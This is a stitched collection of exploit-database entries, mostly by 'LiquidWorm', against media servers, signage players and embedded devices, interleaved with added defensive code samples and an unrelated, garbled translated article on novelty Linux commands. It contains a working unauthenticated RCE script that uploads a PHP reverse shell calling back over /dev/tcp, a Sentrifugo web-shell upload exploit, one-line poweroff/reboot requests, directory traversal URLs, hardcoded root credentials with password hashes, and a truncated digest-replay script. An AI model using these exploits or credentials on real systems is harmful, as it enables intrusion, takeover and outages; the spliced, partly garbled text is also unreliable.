Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.409664 ('Update Weather Feed'): /home/arq/bin/widget/weather_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.413391 ('Check for Network Configuration changes'): /home/arq/bin/check_netconf.sh
Oct 14 09:20:25 [warning] BrowserProtocolClient_15[pid 11532, tid -1544549520]: (pandoralist.py/282) No Pandora user configured.
Oct 14 09:20:35 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681635.425757 ('Ask all currently-attached IMCs to answer a rollcall'): /home/arq/bin/imcRollcall.sh
Oct 14 09:20:35 [debug] ini[pid 12089, tid -1251767440]: (iniengine.py/621) Setting MPP30345_STATUS:Rollcall to 1602681635.45
...
...
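
Added example (not the vendor's code): apart from /message_log being reachable without authentication, the excerpt above exposes the NAS password because the full mountnas.py command line is written to the debug log. A logging filter such as the one below masks password arguments before a record is written; the flags it matches (-p, --password) and the logger wiring are assumptions based on the excerpt.

```python
import io
import logging
import re

# Matches "-p <value>" and "--password=<value>", value bare or quoted.
# Assumption: in the logged commands -p always carries a password, as it does
# in the mountnas.py line of the excerpt.
_SECRET_ARG = re.compile(
    r"""(?P<flag>(?<!\S)(?:-p|--password)(?:\s+|=))"""
    r"""(?P<value>'[^']*'|"[^"]*"|\S+)"""
)
MASK = "'[REDACTED]'"


def redact(message):
    """Replace the value of every password argument, keep the rest intact."""
    return _SECRET_ARG.sub(lambda m: m.group("flag") + MASK, message)


class RedactSecrets(logging.Filter):
    """Rewrite the record in place so no handler ever sees the secret."""

    def filter(self, record):
        record.msg = redact(record.getMessage())
        record.args = ()
        return True


# Message part of one line from the excerpt above.
SAMPLE = ("Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' "
          "-u 'admin' -p 'zePassw0rd' 2>/dev/null")


def logged_output(message, *args):
    """Log one debug message through the filter and return what was written."""
    stream = io.StringIO()
    handler = logging.StreamHandler(stream)
    handler.addFilter(RedactSecrets())
    logger = logging.getLogger("discodaemon.example")   # hypothetical logger name
    logger.handlers = [handler]
    logger.setLevel(logging.DEBUG)
    logger.propagate = False
    logger.debug(message, *args)
    return stream.getvalue()


if __name__ == "__main__":
    print(logged_output(SAMPLE), end="")
    print(logged_output("Mount NAS verify: %s", "df /MP3/NAS000000003 2>/dev/null"), end="")
```

Masking the log is a second line of defence; passing the password to the helper through a file or environment variable keeps it out of process listings as well.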
            
# Exploit Title: ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure Vulnerability
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0

ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability


Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 3.0.0
                  2.1.0.831
                  1.5.2.822
                  1.5.2.821
                  1.5.1.820

Summary: With the MediaPlayer, ReQuest delivers video content and award-winning
distributed music capabilities. Up to 4 MediaPlayers (15 when coupled with an
approved NAS) can be connected through your home network to your ReQuest system,
delivering HD video to your television in 1080p via HDMI outputs.

Desc: The device suffers from an unauthenticated file disclosure vulnerability
when input passed through the 'file' parameter in tail.html and file.html script
is not properly verified before being used to read web log files. This can be
exploited to disclose contents of files from local resources.

===============================================================================
/tail.html:
-----------

function load_data()
{

   var elem = $("#data");
   $.ajax({url:"tail.html", 
           data:{
                 file:elem.attr("file"),
                 start:elem.attr("nextstart"),
                 tail:elem.attr("tail")?elem.attr("tail"):undefined,
                 max:elem.attr("max")?elem.attr("max"):undefined},
                 cache:false,
                 async:true,
                 success:show_data}
                 );
}

function main_start()
{

   $("#data").attr({"nextstart": 0, "max": "", "tail": 10000, "update": 5, "file": "C:\\\\ReQuest\\\\mpweb\\log\\mpweb.log"});
   window.setTimeout(load_data, 1);
}

function show_data(data, status, jqxhr)
{
   var data = $("filedata", data);
   var newdata = data.attr("data");
   var start = data.attr("start");
   var nextstart = data.attr("nextstart");
   var elem = $("#data");
   var at_end = ($(document).scrollTop()>=$(document).height()-window.innerHeight-20);
   elem.attr({tail:"", start:start, nextstart:nextstart});
   if (newdata.length)
      elem.append(htmlspecialchars(newdata));
   var delay = parseFloat(elem.attr("update"))*1000;
   if (isNaN(delay))
      delay = 5000;
   if (at_end)
      $("html,body").scrollTop($(document).height());
   window.setTimeout(load_data, delay);
}

$(document).ready(main_start);

===============================================================================

Tested on: ReQuestHTTP/0.1 httpserver/0.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5599
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php


01.08.2020

--


http://192.168.1.17:8001/tail.html?file=C:\\ReQuest\\mpweb\httpserver.py
http://192.168.1.17:8001/file.html?file=C:\windows\win.ini
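
Added example (not the vendor's code): tail.html and file.html accept any path in 'file', while the page's own script only ever asks for mpweb.log in the log directory. The check below confines a requested name to that directory using Windows path rules (ntpath, so it behaves the same on any host); the function names and the ".log" suffix rule are assumptions, and the log directory is taken from the default in main_start() above.

```python
import ntpath

# Directory of the default "file" value set in main_start() above.
LOG_DIR = r"C:\ReQuest\mpweb\log"
ALLOWED_SUFFIXES = (".log",)          # assumption: only log files are served


class PathRejected(ValueError):
    """Raised when the requested file is outside what the viewer may read."""


def resolve_log_path(requested, base=LOG_DIR):
    """Return the normalized absolute path if it is a log file under base."""
    if not requested or "\x00" in requested:
        raise PathRejected("empty name or embedded NUL")

    base_norm = ntpath.normpath(base)
    # join() lets an absolute or other-drive name replace base entirely, and
    # normpath() collapses "..", "." and doubled separators; the containment
    # test below is what actually rejects such names.
    candidate = ntpath.normpath(ntpath.join(base_norm, requested))

    # Windows paths compare case-insensitively.
    base_key = ntpath.normcase(base_norm)
    cand_key = ntpath.normcase(candidate)
    try:
        inside = ntpath.commonpath([base_key, cand_key]) == base_key
    except ValueError:                # different drive or UNC share
        inside = False
    if not inside or cand_key == base_key:
        raise PathRejected("outside the log directory")

    # Suffix allowlist; also rejects stream syntax and trailing dots/spaces.
    if not cand_key.endswith(ALLOWED_SUFFIXES):
        raise PathRejected("not a log file")
    return candidate


def is_allowed(requested):
    try:
        resolve_log_path(requested)
        return True
    except PathRejected:
        return False


if __name__ == "__main__":
    # Values from the page, plus constructed variants.
    for name in ["mpweb.log",
                 r"C:\\ReQuest\\mpweb\log\mpweb.log",
                 r"C:\\ReQuest\\mpweb\httpserver.py",
                 r"C:\windows\win.ini",
                 r"..\httpserver.py"]:
        print(f"{name!r:45} allowed={is_allowed(name)}")
```

This check is lexical only; on the device itself the resolved path should also be compared after following junctions and symbolic links, for example with os.path.realpath.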
            
# Exploit Title: TDM Digital Signage PC Player 4.1 - Insecure File Permissions
# Date: 2020-09-23
# Exploit Author: LiquidWorm
# Software Link: https://www.tdmsignage.com / https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y
# Version: 4.1.0.4

Vendor: TDM [Trending Digital Marketing]
Product web page: https://www.tdmsignage.com
                  https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y
Affected version: 4.1.0.4

Summary: With TDM you can do a lot more than just show Digital Signage.
With our Enterprise-Grade software you open the door to Interactive Signage,
Analytics, Proof of Play and a lot more.

Desc: TDM Digital Signage Windows Player suffers from an elevation of
privileges vulnerability which can be used by a simple authenticated
user that can change the executable file with a binary of choice. The
vulnerability exists due to improper permissions, with the 'M' flag
(Modify) or 'C' flag (Change) for 'Authenticated Users' group.

Tested on: Microsoft Windows 10 Home


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5604
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5604.php

23.09.2020

--


C:\>icacls TDMSignage
TDMSignage BUILTIN\Administrators:(I)(OI)(CI)(F)
           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
           BUILTIN\Users:(I)(OI)(CI)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)              <---------<<<
           NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)  <---------<<<

Successfully processed 1 files; Failed processing 0 files

C:\TDMSignage>dir /b *.exe
Player.exe
unins000.exe

C:\TDMSignage>icacls Player.exe && icacls unins000.exe
Player.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)              <---------<<<

Successfully processed 1 files; Failed processing 0 files
unins000.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)            <---------<<<

Successfully processed 1 files; Failed processing 0 files
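
A defender can audit for this class of weak ACL by parsing icacls output. The script below is an added example, not part of the advisory: it flags entries where a broad group holds a write-capable right. The function names, the set of broad principals and the set of write-capable rights are assumptions of this example, and the sample input is the listing above without prompts and arrows.

```python
import re

# icacls rights that let a principal alter or replace a file
# (simple rights F/M/W/D plus specific rights that imply writing).
WRITE_RIGHTS = {"F", "M", "W", "D", "GA", "GW", "WD", "AD", "WDAC", "WO", "DE", "DC"}

# Assumed list of principals that include ordinary, non-administrative users.
BROAD_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<perms>(?:\([^()]*\))+)$")

# Output copied from the listing above, without prompts and arrows.
SAMPLE_ICACLS = r"""
TDMSignage BUILTIN\Administrators:(I)(OI)(CI)(F)
           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
           BUILTIN\Users:(I)(OI)(CI)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)
           NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files
Player.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
unins000.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(text):
    """Return {object: [(principal, {flags and rights}), ...]} from icacls output."""
    acls, block = {}, []

    def flush():
        if not block:
            return
        first, rest = block[0], block[1:]
        if rest:
            # Continuation lines are aligned with the first principal, so their
            # indent tells where the object name ends (names may contain spaces).
            indent = len(rest[0]) - len(rest[0].lstrip())
            obj, entries = first[:indent].rstrip(), [first[indent:]] + rest
        else:
            # Single-ACE block: fall back to splitting at the first space.
            obj, _, ace = first.partition(" ")
            entries = [ace]
        for entry in entries:
            m = ACE_RE.match(entry.strip())
            if m:
                tokens = set()
                for group in re.findall(r"\(([^()]*)\)", m.group("perms")):
                    tokens.update(t.strip() for t in group.split(","))
                acls.setdefault(obj, []).append((m.group("principal"), tokens))
        block.clear()

    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("Successfully processed"):
            flush()
        else:
            block.append(line)
    flush()
    return acls


def weak_entries(text):
    """Return (object, principal, rights) for ACEs that let a broad group write."""
    findings = []
    for obj, aces in parse_icacls(text).items():
        for principal, tokens in aces:
            if "DENY" in tokens or principal.lower() not in BROAD_PRINCIPALS:
                continue
            risky = tokens & WRITE_RIGHTS
            if risky:
                # Inherit-only (IO) entries are reported too: they apply to
                # every file created below the directory.
                findings.append((obj, principal, ",".join(sorted(risky))))
    return findings


if __name__ == "__main__":
    for obj, principal, rights in weak_entries(SAMPLE_ICACLS):
        print(f"{obj}: {principal} holds {rights}")
```

On a correctly locked-down install directory the function returns an empty list; any finding on an executable that runs with higher privileges deserves a tightened ACL.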
            
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# ReQuest Serious Play F3 Media Server 7.0.3 Unauthenticated Remote Code Execution
# 
# 
# Vendor: ReQuest Serious Play LLC
# Product web page: http://www.request.com
# Affected version: 7.0.3.4968 (Pro)
#                   7.0.2.4954
#                   6.5.2.4954
#                   6.4.2.4681
#                   6.3.2.4203
#                   2.0.1.823
# 
# Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
# into a compact powerhouse. With the ability to add unlimited NAS devices, the
# F3 can handle your entire family's media collection with ease.
# 
# Desc: The ReQuest ARQ F3 web server suffers from an unauthenticated remote
# code execution vulnerability. Abusing the hidden ReQuest Internal Utilities
# page (/tools) from the services provided, an attacker can exploit the Quick
# File Uploader (/tools/upload.html) page and upload PHP executable files that
# result in remote code execution as the web server user.
#
# =============================================================================
# lqwrm@metalgear:~/prive$ python3 ReQuest.py 192.168.1.17:3664 192.168.1.22 6161
# Let's see waddup...
# Good to go.
# Starting handler on port 6161.
# Writing callback file...
# We got the dir: /75302IV29ZS1
# Checking write status...
# All is well John Spartan. Calling your listener...
# Connection from 192.168.0.17:42057
# You got shell.
# id;uname -ro
# uid=81(apache) gid=81(apache) groups=81(apache),666(arq)
# 3.2.0-4-686-pae GNU/Linux
# exit
# *** Connection closed by remote host ***
# lqwrm@metalgear:~/prive$
# =============================================================================
# 
# Tested on: ReQuest Serious Play® OS v7.0.1
#            ReQuest Serious Play® OS v6.0.0
#            Debian GNU/Linux 5.0
#            Linux 3.2.0-4-686-pae
#            Linux 2.6.36-request+lenny.5
#            Apache/2.2.22
#            Apache/2.2.9
#            PHP/5.4.45
#            PHP/5.2.6-1
# 
# 
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
# 
# 
# Advisory ID: ZSL-2020-5602
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5602.php
# 
# 
# 01.08.2020
#

from time import sleep
import threading######
import telnetlib######
import requests#######
import socket#########
import sys############
import re#############

class Manhattan:
    
    def __init__(self):
        self.secretagent = "Mushu"
        self.payload = None
        self.deploy = None
        self.rhost = None
        self.lhost = None
        self.lport = None

    def the_args(self):
        if len(sys.argv) != 4:
            self.the_usage()
        else:
            self.rhost = sys.argv[1]
            self.lhost = sys.argv[2]
            self.lport = int(sys.argv[3])
            if not "http" in self.rhost:
                self.rhost = "http://{}".format(self.rhost)

    def the_usage(self):
        self.the_wha()
        print("Usage: python3 {} [targetIP:targetPORT] [localIP] [localPORT]".format(sys.argv[0]))
        print("Example: python3 {} 192.168.0.91:3664 192.168.0.22 6161\n".format(sys.argv[0]))
        exit(0)

    def the_wha(self):
        titl = "ReQuest Serious Play F3 Media Server RCE"
        print(titl)

    def the_check(self):
        print("Let's see waddup...")
        try:
            r = requests.get(self.rhost + "/MP3/")
            if "000000000000" in r.text:
                print("Good to go.")
            else:
                print("Something's fishy.")
                exit(-16)
        except Exception as e:
            print("Hmmm {msg}".format(msg=e))
            exit(-1)

    def the_upload(self):
        print("Writing callback file...")
        self.headers = {"Cache-Control" : "max-age=0", 
                        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarylGyylNPXG5WMGCqP",
                        "User-Agent": self.secretagent,
                        "Accept" : "*/*",
                        "Accept-Encoding": "gzip, deflate",
                        "Accept-Language": "en-US,en;q=0.9",
                        "Connection": "close"}
    
        self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/" + self.lhost+ "/" +str(self.lport) + "  <&1;rm bd0.php'\");"

        self.deploy  = "------WebKitFormBoundarylGyylNPXG5WMGCqP\r\n"########
        self.deploy += "Content-Disposition: form-data; name=\"uploa"       #
        self.deploy += "dedfile\"; filename=\"bd0.php\"\r\nContent-T"       #
        self.deploy += "ype: application/octet-stream\r\n\r\n" + self.payload
        self.deploy += "\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP\r\nConte"
        self.deploy += "nt-Disposition: form-data; name=\"location\"\r\n\r\nm"
        self.deploy += "p3\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP--\r\n"
    
        requests.post(self.rhost+"/shared/upload.php", headers=self.headers, data=self.deploy)
        sleep(1)
        r = requests.get(self.rhost + "/MP3/")
        regex = re.findall(r'a\shref=\"(.*)\/\">', r.text)[2]
        print("We got the dir: /" + regex)
        print("Checking write status...")
        r = requests.get(self.rhost + "/MP3/" + regex)
        if "bd0" in r.text:
            print("All is well John Spartan. Calling your listener...")
        else:
            print("Something...isn't right.")
            exit(-16)    
        requests.get(self.rhost + "/MP3/"+ regex + "/bd0.php")       

    def the_subp(self):
        konac = threading.Thread(name="ZSL", target=self.the_ear)
        konac.start()
        sleep(1)
        self.the_upload()

    def the_ear(self):
        telnetus = telnetlib.Telnet()
        print("Starting handler on port {}.".format(self.lport))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", self.lport))
        while True:
            try:
                s.settimeout(7)
                s.listen(1)
                conn, addr = s.accept()
                print("Connection from {}:{}".format(addr[0], addr[1]))
                telnetus.sock = conn
            except socket.timeout as p:
                print("Hmmm ({msg})".format(msg=p))
                s.close()
                exit(0)
            break

        print("You got shell.")
        telnetus.interact()
        conn.close()

    def main(self):
        self.the_args()
        self.the_check()
        self.the_subp()

if __name__ == '__main__':
    Manhattan().main()
            
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0



Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 7.0.3.4968 (Pro)
                  7.0.2.4954
                  6.5.2.4954
                  6.4.2.4681
                  6.3.2.4203
                  2.0.1.823

Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
into a compact powerhouse. With the ability to add unlimited NAS devices, the
F3 can handle your entire family's media collection with ease.

Desc: The device can be shut down or rebooted by an unauthenticated attacker
who issues a single HTTP GET request.

Tested on: ReQuest Serious Play® OS v7.0.1
           ReQuest Serious Play® OS v6.0.0
           Debian GNU/Linux 5.0
           Linux 3.2.0-4-686-pae
           Linux 2.6.36-request+lenny.5
           Apache/2.2.22
           Apache/2.2.9
           PHP/5.4.45
           PHP/5.2.6-1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2020-5601
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php


01.08.2020

--


$ curl http://192.168.1.17:3664/remote/index.php?cmd=poweroff
$ curl http://192.168.1.17:3664/remote/index.php?cmd=reboot
            

Some Linux commands are rarely used but a lot of fun. Do you know them? Let's take a look in this article!

figlet

The figlet command turns text into attractive character drawings.

First, install it by running the following command:

apt-get install figlet

Example:

figlet bbskali.cn

aafire

The aafire command displays a burning flame in the terminal.

Install:

apt-get install aafire

fortune

The fortune command prints a random sentence: a famous English quote, a Tang poem, or Song lyrics. If no Tang poems or Song lyrics appear, you need to install them:

apt-get install fortune fortunes-zh

《詩經‧ 國風‧ 周南‧ 汝墳》

I followed my treasure and beat my treasures. I didn’t see a gentleman, and I was as fond as if I were swaying.

I obey your lords and attack your lords. Once I see a gentleman, I will not abandon you.

The squid is a squid, and the royal family is like a squid, although it is like a squid, and the parents are Kong Gui.

sl

The sl command runs a train across the terminal. Note that its name is exactly the reverse of ls.

Install:

apt-get install sl

cowsay

The cowsay command draws a character-art cow with a speech bubble. The text in the bubble can be customized.

cowsay 'Welcome to follow the WeChat public account kali Hacker Notes'

You can also use -f to select other animals:

(bunny calvin cheere cock cower daemon default dragon
dragon-and-cow duck elephant elephant-in-snake eyes flaming-sheep fox
ghostbusters gnu hellokitty kangaroo kiss koala kosh luke-koala
mech-and-cow milk moofasa moose pony pony-smaller ren sheep skeleton
snowman stegosaurus stimpy suse three-eyes turkey turtle tux unipony
unipony-smaller vader vader-koala www)

cmatrix

The digital rain effect from the movie The Matrix.

asciiview

The asciiview command converts any picture into character art and prints it.

hollywood

It resembles the screens in many hacker movies and has a very impressive show-off effect.

Installation is also very simple: just use the apt command to install it.

# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
# Date: 26/10/2020
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
# Vendor Homepage: http://www.sentrifugo.com/
# POC Link: https://www.exploit-db.com/exploits/47323
# Version: 3.2
# Tested on: Linux and Windows
# CVE : CVE-2019-15813
# Contact Details: https://google.com/search?q=tbhaxor

from argparse import ArgumentParser, RawTextHelpFormatter
from bs4 import BeautifulSoup, Tag
from requests.sessions import Session
import tempfile as tmp
import os.path as path
import random
import string
from huepy import *

parser = ArgumentParser(description="Exploit for CVE-2019-15813",
                        formatter_class=RawTextHelpFormatter)
parser.add_argument("--target",
                    "-t",
                    help="target uri where application is installed",
                    required=True,
                    metavar="",
                    dest="t")
parser.add_argument("--user",
                    "-u",
                    help="username to authenticate",
                    required=True,
                    metavar="",
                    dest="u")
parser.add_argument("--password",
                    "-p",
                    help="password to authenticate",
                    required=True,
                    metavar="",
                    dest="p")
args = parser.parse_args()

if args.t.endswith("/"):
    args.t = args.t[:-1]

F = "".join(random.choices(string.ascii_letters, k=13)) + ".php"

with Session() as http:
    print(run("Logging in"))
    data = {"username": args.u, "password": args.p}

    r = http.post(args.t + "/index.php/index/loginpopupsave",
                  data=data,
                  allow_redirects=False)

    if not (r.headers.get("Location", "").endswith("welcome")
            or r.headers.get("Location", "").endswith("welcome/")):
        print(bad("Unable to login. Check username / password"))
        exit(1)
    print(good("Logged in"))

    print(run("Exploiting"))
    files = {"myfile": ("shell.php", "<?php system($_POST['cmd']); ?>")}

    r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files)
    if r.status_code != 200:
        print(bad("Unable to upload file"))
        exit(1)
    file_name = r.json()["filedata"]["new_name"]
    print(info("Spawning shell"))

    user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
                     data={"cmd": "whoami"})
    host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
                     data={"cmd": "cat /etc/hostname"})
    shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"

    while True:
        try:
            cmd = input(shell)
            if cmd == "exit": break
            r = http.post(args.t + "/public/uploads/policy_doc_temp/" +
                          file_name,
                          data={"cmd": cmd})
            print(r.content.decode().strip())
        except Exception as e:
            print()
            break

    print(run("Cleaning"))
    http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
              data={"cmd": "rm %s" % file_name})
    r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name)
    if r.status_code == 404:
        print(good("Cleaned"))
    else:
        print(bad("Unable to clean the file"))
            
# Exploit Title: Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root
# Date: 2020-07-24
# Exploit Author: LiquidWorm
# Software Link: https://www.adtecdigital.com / https://www.adtecdigital.com/support/documents-downloads
# Version: Multiple

Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root


Vendor: Adtec Digital, Inc.
Product web page: https://www.adtecdigital.com
                  https://www.adtecdigital.com/support/documents-downloads
Affected version: SignEdje Digital Signage Player v2.08.28
                  mediaHUB HD-Pro High & Standard Definition MPEG2 Encoder v3.07.19
                  afiniti Multi-Carrier Platform v1905_11
                  EN-31 Dual Channel DSNG Encoder / Modulator v2.01.15
                  EN-210 Multi-CODEC 10-bit Encoder / Modulator v3.00.29
                  EN-200 1080p AVC Low Latency Encoder / Modulator v3.00.29
                  ED-71 10-bit / 1080p Integrated Receiver Decoder v2.02.24
                  edje-5110 Standard Definition MPEG2 Encoder v1.02.05
                  edje-4111 HD Digital Media Player v2.07.09
                  Soloist HD-Pro Broadcast Decoder v2.07.09
                  adManage Traffic & Media Management Application v2.5.4

Summary: Adtec Digital is a leading manufacturer of Broadcast, Cable and IPTV products and
solutions.

Desc: The devices utilize hard-coded and default credentials within their Linux distribution
image for Web/Telnet/SSH access. A remote attacker could exploit this vulnerability by logging
in using the default credentials to access the web interface or gain shell access as root.

Tested on: GNU/Linux 4.1.8 (armv7l)
           GNU/Linux 3.12.38 (PowerPC)
           GNU/Linux 2.6.14 (PowerPC)
           Adtec Embedded Linux 0.9 (fido)
           Apache


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5603
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5603.php


24.07.2020

--


Creds:
------

adtec:none:500:1000:adtec:/media:/bin/sh
admin:1admin!:502:502:admin:/home/admin:/bin/sh
root1:1root!:0:0:root:/root:/bin/sh
adtecftp:adtecftp2231


SSH:
----

login as: root
root@192.168.3.12's password:

Successfully logged in.
Thank you for choosing Adtec Digital products-
we know you had a choice and we appreciate your decision!

root@targethostname:~# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
--
admin@targethostname:/$ id
uid=502(admin) gid=502(admin) groups=0(root),502(admin)
admin@targethostname:~$ id adtec
uid=500(adtec) gid=1000(users) groups=1000(users),72(apache)
admin@targethostname:~$ cat /etc/sudoers |grep -v "#"
root    ALL=(ALL) ALL
apache ALL=(ALL) NOPASSWD: ALL


Telnet (API):
-------------

Adtec Resident Telnet Server...
UserName:
adtec
adtec
PassWord:
none
User adtec connected
*.SYSD SHELLCMD cat /etc/passwd
*.SYSD CMD cat /etc/passwd
OK
root:he7TRuXjJjxfc:0:0:root:/root:/bin/sh
adtec:GC1BpYa80PaoY:500:1000:adtec:/media:/bin/sh
apache:!!:72:72:Apache Server:/dev/null:/sbin/nologin
fregd:!!:73:73:Freg Daemon:/dev/null:/sbin/nologin
ntp:!!:38:38:NTP Server:/dev/null:/sbin/nologin
syslogd:!!:74:74:Syslog Daemon:/dev/null:/sbin/nologin
admin:rDglOB38TVYRg:502:502:admin:/home/admin:/bin/sh
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
avahi:x:82:82:Avahi Daemon:/dev/null/:/sbin/nologin
avahi-autoipd:x:83:83:Avahi Autoipd:/dev/null/:/sbin/nologin
messagebus:x:81:81:Message Bus Daemon:/dev/null:/sbin/nologin
...
...
            
# Exploit Title: GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse
# Date: 2019-08-29
# Exploit Author: LiquidWorm
# Software Link: https://www.embedthis.com
# Version: 5.1.1

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse
#
#
# Vendor: Embedthis Software LLC
# Product web page: https://www.embedthis.com
# Affected version: <=5.1.1 and <=4.1.2
# Fixed version: >=5.1.2 and >=4.1.3
#
# Summary: GoAhead is the world's most popular, tiny embedded web server. It is compact,
# secure and simple to use. GoAhead is deployed in hundreds of millions of devices and is
# ideal for the smallest of embedded devices.
#
# Desc: A security vulnerability affecting GoAhead versions 2 to 5 has been identified when
# using Digest authentication over HTTP. The HTTP Digest Authentication in the GoAhead web
# server does not completely protect against replay attacks. This allows an unauthenticated
# remote attacker to bypass authentication via capture-replay if TLS is not used to protect
# the underlying communication channel. Digest authentication uses a "nonce" value to mitigate
# replay attacks. GoAhead versions 3 to 5 validated the nonce with a fixed duration of 5 minutes
# which permitted short-period replays. This duration is too long for most implementations.
#
# Tested on: GoAhead-http
#            GoAhead-Webs
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5598
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5598.php
#
# CVE ID: CVE-2020-15688
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15688
#          https://nvd.nist.gov/vuln/detail/CVE-2020-15688
#
# CWE ID: CWE-294 Authentication Bypass by Capture-replay
# CWE URL: https://cwe.mitre.org/data/definitions/294.html
# 
# CWE ID: CWE-323: Reusing a Nonce, Key Pair in Encryption
# CWE URL: https://cwe.mitre.org/data/definitions/323.html
#
# GoAhead Security Alerts / Fix:
#  https://github.com/embedthis/goahead-gpl/issues/3
#  https://github.com/embedthis/goahead-gpl/issues/2
#  https://github.com/embedthis/goahead-gpl/commit/fe0662f945bd7e24b8d621929e1b93d8a7f3f08f#diff-0988df549d878c849d7f2c073319bcb2
#
#
# 29.08.2019
#


#
# PoC for a network controller running GoAhead web server.
# Replay Authentication Bypass / Create Admin User
#

import requests
import sys#####

if (len(sys.argv) <= 1):
    print("Usage: ./nen.py <ipaddress>")
    exit(0)

ip = sys.argv[1]

url = "http://"+ip+"/goform/formUserManagementAdd?lang=en"
kolache = {"lang":"en"}

replay  = "Digest username=\"admin\", "
replay += "realm=\"GoAhead\", "
replay += "nonce=\"5fb3ce6dec423bf8b8f0dfc8cf65244d\", "
replay += "uri=\"/goform/formUserManagementAdd?lang=en\", "
replay += "algorithm=MD5, "
replay += "response=\"1c05f4d08aa0cfcc5318882e0fb4e9af\", "
replay += "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\", "
replay += "qop=auth, "
replay += "nc=0000000a, "
replay += "cnonce=\"0649f631320f23bb\""

headers = {"Cache-Control": "max-age=0",
           "Authorization": replay,
           "Content-Type": "application/x-www-form-urlencoded",
           "User-Agent": "NoProxy/NoProblem.251",
           "Accept-Encoding": "gzip, deflate",
